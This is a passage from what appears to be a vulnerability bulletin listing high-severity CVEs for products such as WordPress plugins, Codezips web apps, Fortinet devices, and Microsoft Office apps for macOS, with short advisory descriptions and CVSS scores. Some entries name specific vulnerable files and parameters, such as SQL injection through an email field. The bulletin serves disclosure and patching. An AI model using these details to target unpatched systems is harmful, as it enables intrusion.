The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-19 | 7.3 | CVE-2024-11740 |
| Codezips--E-Commerce Site |
A vulnerability was found in Codezips E-Commerce Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file signin.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 7.3 | CVE-2024-12791 |
| Codezips--E-Commerce Site |
A vulnerability classified as critical was found in Codezips E-Commerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file newadmin.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 7.3 | CVE-2024-12792 |
| Codezips--E-Commerce Website |
A vulnerability was found in Codezips E-Commerce Website 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-21 | 7.3 | CVE-2024-12884 |
| Codezips--Technical Discussion Forum |
A vulnerability was found in Codezips Technical Discussion Forum 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file signinpost.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 7.3 | CVE-2024-12788 |
| collizo4sky--kk Star Ratings Rate Post & Collect User Feedbacks |
The The kk Star Ratings - Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-21 | 7.3 | CVE-2024-11977 |
| CRUDLab--CRUDLab Google Plus Button |
Cross-Site Request Forgery (CSRF) vulnerability in CRUDLab CRUDLab Google Plus Button allows Stored XSS.This issue affects CRUDLab Google Plus Button: from n/a through 1.0.2. | 2024-12-16 | 7.1 | CVE-2024-54399 |
| Cyle Conoly--WP-HideThat |
Cross-Site Request Forgery (CSRF) vulnerability in Cyle Conoly WP-HideThat allows Stored XSS.This issue affects WP-HideThat: from n/a through 1.2. | 2024-12-16 | 7.1 | CVE-2024-54415 |
| dani-garcia--vaultwarden |
vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. In affected versions an attacker is capable of updating or deleting groups from an organization given a few conditions: 1. The attacker has a user account in the server. 2. The attacker's account has admin or owner permissions in an unrelated organization. 3. The attacker knows the target organization's UUID and the target group's UUID. Note that this vulnerability is related to group functionality and as such is only applicable for servers who have enabled the `ORG_GROUPS_ENABLED` setting, which is disabled by default. This attack can lead to different situations: 1. Denial of service, the attacker can limit users from accessing the organization's data by removing their membership from the group. 2. Privilege escalation, if the attacker is part of the victim organization, they can escalate their own privileges by joining a group they wouldn't normally have access to. For attackers that aren't part of the organization, this shouldn't lead to any possible plain-text data exfiltration as all the data is encrypted client side. This vulnerability is patched in Vaultwarden `1.32.7`, and users are recommended to update as soon as possible. If it's not possible to update to `1.32.7`, some possible workarounds are: 1. Disabling `ORG_GROUPS_ENABLED`, which would disable groups functionality on the server. 2. Disabling `SIGNUPS_ALLOWED`, which would not allow an attacker to create new accounts on the server. | 2024-12-20 | 7.6 | CVE-2024-56335 |
| Dassault Systmes--ENOVIA Collaborative Industry Innovator |
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session. | 2024-12-16 | 8.7 | CVE-2024-12089 |
| Dassault Systmes--ENOVIA Collaborative Industry Innovator |
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator on Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session. | 2024-12-16 | 8.7 | CVE-2024-12090 |
| Dassault Systmes--ENOVIA Collaborative Industry Innovator |
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session. | 2024-12-16 | 8.7 | CVE-2024-12091 |
| Dassault Systmes--ENOVIA Collaborative Industry Innovator |
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator on Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session. | 2024-12-16 | 8.7 | CVE-2024-12092 |
| David Cramer--Bootstrap Buttons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Cramer Bootstrap Buttons allows Reflected XSS.This issue affects Bootstrap Buttons: from n/a through 1.2. | 2024-12-18 | 7.1 | CVE-2024-49677 |
| Dell--Inventory Collector Client |
Dell Inventory Collector Client, versions prior to 12.7.0, contains an Improper Link Resolution Before File Access vulnerability. A low-privilege attacker with local access may exploit this vulnerability, potentially resulting in Elevation of Privileges and unauthorized file system access. | 2024-12-18 | 7.8 | CVE-2024-47480 |
| Dell--PowerStore |
Dell PowerStore contains an Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to modification of arbitrary system files. | 2024-12-19 | 7.1 | CVE-2024-51532 |
| Delta Electronics--DTM Soft |
Delta Electronics DTM Soft deserializes objects, which could allow an attacker to execute arbitrary code. | 2024-12-20 | 7.8 | CVE-2024-12677 |
| Derek Hamilton--PowerFormBuilder |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Derek Hamilton PowerFormBuilder allows SQL Injection.This issue affects PowerFormBuilder: from n/a through 1.0.6. | 2024-12-18 | 8.5 | CVE-2024-55983 |
| discourse--discourse |
Discourse is an open source platform for community discussion. This vulnerability only impacts Discourse instances configured to use `FileStore::LocalStore` which means uploads and backups are stored locally on disk. If an attacker knows the name of the Discourse backup file, the attacker can trick nginx into sending the Discourse backup file with a well crafted request. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. Users unable to upgrade can either 1. Download all local backups on to another storage device, disable the `enable_backups` site setting and delete all backups until the site has been upgraded to pull in the fix. Or 2. Change the `backup_location` site setting to `s3` so that backups are stored and downloaded directly from S3. | 2024-12-19 | 7.5 | CVE-2024-53991 |
| Ecommerce Templates--ECT Product Carousel |
Cross-Site Request Forgery (CSRF) vulnerability in Ecommerce Templates ECT Product Carousel allows Stored XSS.This issue affects ECT Product Carousel: from n/a through 1.9. | 2024-12-16 | 7.1 | CVE-2024-54412 |
| Edgecross Consortium--Edgecross Basic Software for Windows |
Incorrect Default Permissions vulnerability in Edgecross Basic Software for Windows versions 1.00 and later and Edgecross Basic Software for Developers versions 1.00 and later allows a malicious local attacker to execute an arbitrary malicious code, resulting in information disclosure, tampering with and deletion, or a denial-of-service (DoS) condition, if the product is installed in a folder other than a folder that only users with administrative privilege have permission to modify. | 2024-12-19 | 7.8 | CVE-2024-4229 |
| Edgecross Consortium--Edgecross Basic Software for Windows |
External Control of File Name or Path vulnerability in Edgecross Basic Software for Windows versions 1.00 and later and Edgecross Basic Software for Developers versions 1.00 and later allows a malicious local attacker to execute an arbitrary malicious code, resulting in information disclosure, tampering with and deletion, or a denial-of-service (DoS) condition. | 2024-12-19 | 7.8 | CVE-2024-4230 |
| Eduardo Chiaro--addWeather |
Cross-Site Request Forgery (CSRF) vulnerability in Eduardo Chiaro addWeather allows Cross Site Request Forgery.This issue affects addWeather: from n/a through 2.5.1. | 2024-12-16 | 7.1 | CVE-2024-54389 |
| envoyproxy--envoy |
Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions `sendOverloadError` is going to assume the active request exists when `envoy.load_shed_points.http1_server_abort_dispatch` is configured. If `active_request` is nullptr, only onMessageBeginImpl() is called. However, the `onMessageBeginImpl` will directly return ok status if the stream is already reset leading to the nullptr reference. The downstream reset can actually happen during the H/2 upstream reset. As a result envoy may crash. This issue has been addressed in releases 1.32.3, 1.31.5, 1.30.9, and 1.29.12. Users are advised to upgrade. Users unable to upgrade may disable `http1_server_abort_dispatch` load shed point and/or use a high threshold. | 2024-12-18 | 7.5 | CVE-2024-53270 |
| envoyproxy--envoy |
Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions envoy does not properly handle http 1.1 non-101 1xx responses. This can lead to downstream failures in networked devices. This issue has been addressed in versions 1.31.5 and 1.32.3. Users are advised to upgrade. There are no known workarounds for this issue. | 2024-12-18 | 7.1 | CVE-2024-53271 |
| Ewald Harmsen--Mollie for Contact Form 7 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ewald Harmsen Mollie for Contact Form 7 allows Blind SQL Injection.This issue affects Mollie for Contact Form 7: from n/a through 5.0.0. | 2024-12-16 | 7.6 | CVE-2024-55990 |
| Filippo Bodei--WP Cookies Enabler |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Filippo Bodei WP Cookies Enabler allows PHP Local File Inclusion.This issue affects WP Cookies Enabler: from n/a through 1.0.1. | 2024-12-16 | 7.5 | CVE-2024-54380 |
| Fortinet--FortiClientLinux |
An execution with unnecessary privileges vulnerability in the VCM engine of FortiClient for Linux versions 6.2.7 and below, version 6.4.0. may allow local users to elevate their privileges to root by creating a malicious script or program on the target machine. | 2024-12-19 | 8.8 | CVE-2020-15934 |
| Fortinet--FortiManager |
A Use After Free (CWE-416) vulnerability in FortiManager version 7.0.0, version 6.4.5 and below, version 6.2.7 and below, version 6.0.10 and below, version 5.6.10 and below, version 5.4.7 and below, version 5.2.10 and below, version 5.0.12 and below and FortiAnalyzer version 7.0.0, version 6.4.5 and below, version 6.2.7 and below, version 6.0.10 and below, version 5.6.10 and below, version 5.4.7 and below, version 5.3.11, version 5.2.10 to 5.2.4 fgfmsd daemon may allow a remote, non-authenticated attacker to execute unauthorized code as root via sending a specifically crafted request to the fgfm port of the targeted device. | 2024-12-19 | 8.1 | CVE-2021-32589 |
| Fortinet--FortiManager |
An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in FortiManager version 7.6.0, version 7.4.4 and below, version 7.2.7 and below, version 7.0.12 and below, version 6.4.14 and below and FortiManager Cloud version 7.4.4 and below, version 7.2.7 to 7.2.1, version 7.0.12 to 7.0.1 may allow an authenticated remote attacker to execute unauthorized code via FGFM crafted requests. | 2024-12-18 | 7.2 | CVE-2024-48889 |
| Fortinet--FortiWAN |
A relative path traversal vulnerability (CWE-23) in FortiWAN version 4.5.7 and below, 4.4 all versions may allow a remote non-authenticated attacker to delete files on the system by sending a crafted POST request. In particular, deleting specific configuration files will reset the Admin password to its default value. | 2024-12-19 | 9.8 | CVE-2021-26102 |
| Fortinet--FortiWAN |
An OS command injection (CWE-78) vulnerability in FortiWAN version 4.5.7 and below Command Line Interface may allow a local, authenticated and unprivileged attacker to escalate their privileges to root via executing a specially-crafted command.An OS command injection (CWE-78) vulnerability in FortiWAN Command Line Interface may allow a local, authenticated and unprivileged attacker to escalate their privileges to root via executing a specially-crafted command. | 2024-12-19 | 7.8 | CVE-2021-26115 |
| Fortinet--FortiWLC |
An access of uninitialized pointer (CWE-824) vulnerability in FortiWLC versions 8.6.0, 8.5.3 and earlier may allow a local and authenticated attacker to crash the access point being managed by the controller by executing a crafted CLI command. | 2024-12-19 | 7.3 | CVE-2021-26093 |
| Fortinet--FortiWLM |
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests. | 2024-12-18 | 9.8 | CVE-2023-34990 |
| ForumWP--ForumWP |
Deserialization of Untrusted Data vulnerability in ForumWP ForumWP allows Object Injection.This issue affects ForumWP: from n/a through 2.1.0. | 2024-12-16 | 9.8 | CVE-2024-54367 |
| Foxit--Foxit Reader |
A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a 3D page object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled. | 2024-12-18 | 8.8 | CVE-2024-47810 |
| Foxit--Foxit Reader |
A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a checkbox CBF_Widget object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled. | 2024-12-18 | 8.8 | CVE-2024-49576 |
| Fujifilm--Apeos C3070 |
A vulnerability has been found in Fujifilm Apeos C3070, Apeos C5570 and Apeos C6580 up to 24.8.28 and classified as critical. This vulnerability affects unknown code of the file /home/index.html#hashHome of the component Web Interface. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-19 | 7.3 | CVE-2024-12782 |
| FXC Inc.--AE1021 |
Weak authentication issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier. If this vulnerability is exploited, the authentication may be bypassed with an undocumented specific string. | 2024-12-18 | 7.5 | CVE-2024-47397 |
| FXC Inc.--AE1021 |
Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier, which may allow a logged-in user to execute an arbitrary OS command using a crafted HTTP request. | 2024-12-18 | 7.2 | CVE-2024-53688 |
| FXC Inc.--AE1021 |
Inclusion of undocumented features or chicken bits issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier, which may allow a logged-in user to enable telnet service. | 2024-12-18 | 7.2 | CVE-2024-54457 |
| fzmaster @ XPD--XPD Reduce Image Filesize |
Cross-Site Request Forgery (CSRF) vulnerability in fzmaster @ XPD XPD Reduce Image Filesize allows Stored XSS.This issue affects XPD Reduce Image Filesize: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54409 |
| Gaowei Tang--Evernote Sync |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gaowei Tang Evernote Sync allows Reflected XSS.This issue affects Evernote Sync: from n/a through 3.0.0. | 2024-12-16 | 7.1 | CVE-2024-54422 |
| GAxx--Gaxx Keywords |
Cross-Site Request Forgery (CSRF) vulnerability in GAxx Gaxx Keywords allows Stored XSS.This issue affects Gaxx Keywords: from n/a through 0.2. | 2024-12-16 | 7.1 | CVE-2024-54438 |
| geoWP--Geoportail Shortcode |
Cross-Site Request Forgery (CSRF) vulnerability in geoWP Geoportail Shortcode allows Stored XSS.This issue affects Geoportail Shortcode: from n/a through 2.4.4. | 2024-12-16 | 7.1 | CVE-2024-54414 |
| Get Push Monkey LLC--Push Monkey Pro Web Push Notifications and WooCommerce Abandoned Cart |
Cross-Site Request Forgery (CSRF) vulnerability in Get Push Monkey LLC Push Monkey Pro - Web Push Notifications and WooCommerce Abandoned Cart allows Cross Site Request Forgery.This issue affects Push Monkey Pro - Web Push Notifications and WooCommerce Abandoned Cart: from n/a through 3.9. | 2024-12-16 | 7.1 | CVE-2024-54386 |
| Govee--Govee Home |
Incorrect authorization vulnerability in HTTP POST method in Govee Home application on Android and iOS allows remote attacker to control devices owned by other users via changing "device", "sku" and "type" fields' values. This issue affects Govee Home applications on Android and iOS in versions before 5.9. | 2024-12-19 | 10 | CVE-2023-4617 |
| gristlabs--grist-core |
grist-core is a spreadsheet hosting server. A user visiting a malicious document or submitting a malicious form could have their account compromised, because it was possible to use the `javascript:` scheme with custom widget URLs and form redirect URLs. This issue has been patched in version 1.3.1. Users are advised to upgrade. Users unable to upgrade should avoid visiting documents or forms prepared by people they do not trust. | 2024-12-20 | 8.1 | CVE-2024-56357 |
| gristlabs--grist-core |
grist-core is a spreadsheet hosting server. A user visiting a malicious document and previewing an attachment could have their account compromised, because JavaScript in an SVG file would be evaluated in the context of their current page. This issue has been patched in version 1.3.2. Users are advised to upgrade. Users unable to upgrade should avoid previewing attachments in documents prepared by people they do not trust. | 2024-12-20 | 8.1 | CVE-2024-56358 |
| gristlabs--grist-core |
grist-core is a spreadsheet hosting server. A user visiting a malicious document and clicking on a link in a HyperLink cell using a control modifier (meaning for example Ctrl+click) could have their account compromised, since the link could use the javascript: scheme and be evaluated in the context of their current page. This issue has been patched in version 1.3.2. Users are advised to upgrade. Users unable to upgrade should avoid clicking on HyperLink cell links using a control modifier in documents prepared by people they do not trust. | 2024-12-20 | 8.1 | CVE-2024-56359 |
| Gueststream--VRPConnector |
Deserialization of Untrusted Data vulnerability in Gueststream VRPConnector allows Object Injection.This issue affects VRPConnector: from n/a through 2.0.1. | 2024-12-18 | 9.8 | CVE-2024-56058 |
| Halim--KH Easy User Settings |
Incorrect Privilege Assignment vulnerability in Halim KH Easy User Settings allows Privilege Escalation.This issue affects KH Easy User Settings: from n/a through 1.0.0. | 2024-12-16 | 8.8 | CVE-2024-54365 |
| Hitachi--Hitachi Ops Center Analyzer |
Authentication Bypass vulnerability in Hitachi Ops Center Analyzer on Linux, 64 bit (Hitachi Ops Center Analyzer detail view component), Hitachi Infrastructure Analytics Advisor on Linux, 64 bit (Hitachi Data Center Analytics component ).This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.3-00; Hitachi Infrastructure Analytics Advisor: from 2.1.0-00 through 4.4.0-00. | 2024-12-17 | 9.4 | CVE-2024-10205 |
| HJYL--hmd |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HJYL hmd allows Stored XSS.This issue affects hmd: from n/a through 2.0. | 2024-12-18 | 7.1 | CVE-2024-54350 |
| hosting.io, campaigns.io--WP Controller |
Cross-Site Request Forgery (CSRF) vulnerability in hosting.io, campaigns.io WP Controller allows Stored XSS.This issue affects WP Controller: from n/a through 3.2.0. | 2024-12-16 | 7.1 | CVE-2024-54411 |
| Huawei--CV81-WDM FW |
There is a command injection vulnerability in Huawei terminal printer product. Successful exploitation could result in the highest privileges of the printer. (Vulnerability ID: HWPSIRT-2022-51773) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32203. | 2024-12-20 | 9.8 | CVE-2022-32203 |
| Huawei--CV81-WDM FW |
There is an insufficient input verification vulnerability in Huawei product. Successful exploitation of this vulnerability may lead to service abnormal. (Vulnerability ID: HWPSIRT-2022-76192) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32144. | 2024-12-20 | 8.6 | CVE-2022-32144 |
| Huawei--CV81-WDM FW |
There is an improper input verification vulnerability in Huawei printer product. Successful exploitation of this vulnerability may cause service abnormal. (Vulnerability ID: HWPSIRT-2022-87185) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32204. | 2024-12-20 | 7.5 | CVE-2022-32204 |
| Huawei--CV81-WDM FW |
Huawei printers have an input verification vulnerability. Successful exploitation of this vulnerability may cause device service exceptions. (Vulnerability ID: HWPSIRT-2022-80078) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-34159. | 2024-12-20 | 7.5 | CVE-2022-34159 |
| IBM--Cognos Analytics |
IBM Cognos Analytics 11.2.0 through 11.2.4 FP4 and 12.0.0 through 12.0.4 is vulnerable to an Expression Language (EL) Injection vulnerability. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, and/or cause the server to crash when using a specially crafted EL statement. | 2024-12-20 | 9 | CVE-2024-51466 |
| IBM--Cognos Analytics |
IBM Cognos Analytics 11.2.0 through 11.2.4 FP4 and 12.0.0 through 12.0.4 could be vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. Attackers can make use of this weakness and upload malicious executable files into the system, and it can be sent to victim for performing further attacks. | 2024-12-20 | 8 | CVE-2024-40695 |
| IBM--Security Verify Access Docker |
IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges. | 2024-12-19 | 7.8 | CVE-2024-35141 |
| Ilya Chekalskiy--Like in Vk.com |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ilya Chekalskiy Like in Vk.com allows Stored XSS.This issue affects Like in Vk.com: from n/a through 0.5.2. | 2024-12-16 | 7.1 | CVE-2024-54424 |
| implecode--eCommerce Product Catalog Plugin for WordPress |
The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the 'customer_panel_password_reset' function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-21 | 8.8 | CVE-2024-12771 |
| Iqonic Design--WPBookit |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Iqonic Design WPBookit allows SQL Injection.This issue affects WPBookit: from n/a through 1.6.0. | 2024-12-16 | 9.3 | CVE-2024-54280 |
| ISDO Software--Web Software |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ISDO Software Web Software allows SQL Injection.This issue affects Web Software: before 3.6. | 2024-12-19 | 9.8 | CVE-2024-10244 |
| Ivan Ovsyannikov--Aphorismus |
Cross-Site Request Forgery (CSRF) vulnerability in Ivan Ovsyannikov Aphorismus allows Stored XSS.This issue affects Aphorismus: from n/a through 1.2.0. | 2024-12-16 | 7.1 | CVE-2024-54429 |
| Jaytesh Barange--Posts Date Ranges |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jaytesh Barange Posts Date Ranges allows Reflected XSS.This issue affects Posts Date Ranges: from n/a through 2.2. | 2024-12-16 | 7.1 | CVE-2024-54387 |
| Jesse Overright--Social Media Sharing |
Cross-Site Request Forgery (CSRF) vulnerability in Jesse Overright Social Media Sharing allows Stored XSS.This issue affects Social Media Sharing: from n/a through 1.1. | 2024-12-16 | 7.1 | CVE-2024-54423 |
| Jettochkin--Jet Footer Code |
Cross-Site Request Forgery (CSRF) vulnerability in Jettochkin Jet Footer Code allows Stored XSS.This issue affects Jet Footer Code: from n/a through 1.4. | 2024-12-16 | 7.1 | CVE-2024-54436 |
| John Godley--Tidy Up |
Cross-Site Request Forgery (CSRF) vulnerability in John Godley Tidy Up allows Reflected XSS.This issue affects Tidy Up: from n/a through 1.3. | 2024-12-16 | 7.1 | CVE-2024-56015 |
| Jules Colle--Advanced Options Editor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jules Colle Advanced Options Editor allows Reflected XSS.This issue affects Advanced Options Editor: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54249 |
| Kyle M. Brown--WP Simple Pay Lite Manager |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kyle M. Brown WP Simple Pay Lite Manager allows SQL Injection.This issue affects WP Simple Pay Lite Manager: from n/a through 1.4. | 2024-12-16 | 7.6 | CVE-2024-55989 |
| launch-page-importer--LaunchPage.app Importer |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in launch-page-importer LaunchPage.app Importer allows SQL Injection.This issue affects LaunchPage.app Importer: from n/a through 1.1. | 2024-12-16 | 9.3 | CVE-2024-55977 |
| Lenovo--Accessories and Display Manager |
An improper certificate validation vulnerability was reported in LADM that could allow a network attacker with the ability to redirect an update request to a remote server and execute code with elevated privileges. | 2024-12-16 | 8.1 | CVE-2024-6001 |
| Lenovo--Accessories and Display Manager |
An improper validation vulnerability was reported in the firmware update mechanism of LADM and LDCC that could allow a local attacker to escalate privileges. | 2024-12-16 | 7.8 | CVE-2024-4762 |
| Lenovo--FileZ Client |
An improper parsing vulnerability was reported in the FileZ client that could allow a crafted file in the FileZ directory to read arbitrary files on the device due to URL preloading. | 2024-12-16 | 7.6 | CVE-2024-8058 |
| LightFTP--LightFTP |
The server lacks thread safety and can be crashed by anomalous data sent by an anonymous user from a remote network. The crash causes the FTP service to become unavailable, affecting all users and processes that rely on it for file transfers. If the crash occurs during file upload or download, it could lead to incomplete file transfers, potentially corrupting data. The repeated crash might also affect the stability of the underlying system, especially if it leads to resource leaks or affects other services. | 2024-12-16 | 7.5 | CVE-2024-11144 |
| Linda MacPhee-Cobb--Category of Posts |
Cross-Site Request Forgery (CSRF) vulnerability in Linda MacPhee-Cobb Category of Posts allows Stored XSS.This issue affects Category of Posts: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54427 |
| LionScripts.com--LionScripts: Site Maintenance & Noindex Nofollow Plugin |
Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.com LionScripts: Site Maintenance & Noindex Nofollow Plugin allows Stored XSS.This issue affects LionScripts: Site Maintenance & Noindex Nofollow Plugin: from n/a through 2.1. | 2024-12-16 | 7.1 | CVE-2024-54425 |
| Lleidanet PKI--eSigna |
Path Traversal and Insecure Direct Object Reference (IDOR) vulnerabilities in the eSignaViewer component in eSigna product versions 1.0 to 1.5 on all platforms allow an unauthenticated attacker to access arbitrary files in the document system via manipulation of file paths and object identifiers. | 2024-12-20 | 7.5 | CVE-2024-12014 |
| Matt Walters--WordPress Filter |
Cross-Site Request Forgery (CSRF) vulnerability in Matt Walters WordPress Filter allows Stored XSS.This issue affects WordPress Filter: from n/a through 1.4.1. | 2024-12-16 | 7.1 | CVE-2024-54391 |
| MELONIQ.NET--AppMaps |
Cross-Site Request Forgery (CSRF) vulnerability in MELONIQ.NET AppMaps allows Stored XSS.This issue affects AppMaps: from n/a through 1.1. | 2024-12-16 | 7.1 | CVE-2024-54400 |
| Merrill M. Mayer--jCarousel |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Merrill M. Mayer jCarousel allows Stored XSS.This issue affects jCarousel: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54437 |
| metagauss--EventPrime Events Calendar, Bookings and Tickets |
The EventPrime - Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the em_ticket_category_data and em_ticket_individual_data parameters in all versions up to, and including, 4.0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. Note: this vulnerability requires the "Guest Submissions" setting to be enabled. It is disabled by default. | 2024-12-17 | 7.2 | CVE-2024-12024 |
| Micha--I Plant A Tree |
Cross-Site Request Forgery (CSRF) vulnerability in Micha I Plant A Tree allows Stored XSS.This issue affects I Plant A Tree: from n/a through 1.7.3. | 2024-12-16 | 7.1 | CVE-2024-54331 |
| Microsoft--Excel |
A library injection vulnerability exists in Microsoft Excel 16.83 for macOS. A specially crafted library can leverage Excel's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-43106 |
| Microsoft--OneNote |
A library injection vulnerability exists in Microsoft OneNote 16.83 for macOS. A specially crafted library can leverage OneNote's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-41159 |
| Microsoft--Outlook |
A library injection vulnerability exists in Microsoft Outlook 16.83.3 for macOS. A specially crafted library can leverage Outlook's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-42220 |
| Microsoft--PowerPoint |
A library injection vulnerability exists in Microsoft PowerPoint 16.83 for macOS. A specially crafted library can leverage PowerPoint's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-39804 |
| Microsoft--Teams (work or school) |
A library injection vulnerability exists in the com.microsoft.teams2.modulehost.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-41138 |
| Microsoft--Teams (work or school) |
A library injection vulnerability exists in the WebView.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-41145 |
| Microsoft--Teams (work or school) |
A library injection vulnerability exists in Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-42004 |
| Microsoft--Word |
A library injection vulnerability exists in Microsoft Word 16.83 for macOS. A specially crafted library can leverage Word's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions. | 2024-12-18 | 7.1 | CVE-2024-41165 |
| Midoks--WP |
Cross-Site Request Forgery (CSRF) vulnerability in Midoks WP allows Stored XSS.This issue affects from n/a through 5.3.5. | 2024-12-16 | 7.1 | CVE-2024-54392 |
| Mighty Digital--Partners |
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Mighty Digital Partners allows Object Injection.This issue affects Partners: from n/a through 0.2.0. | 2024-12-18 | 9.8 | CVE-2024-56059 |
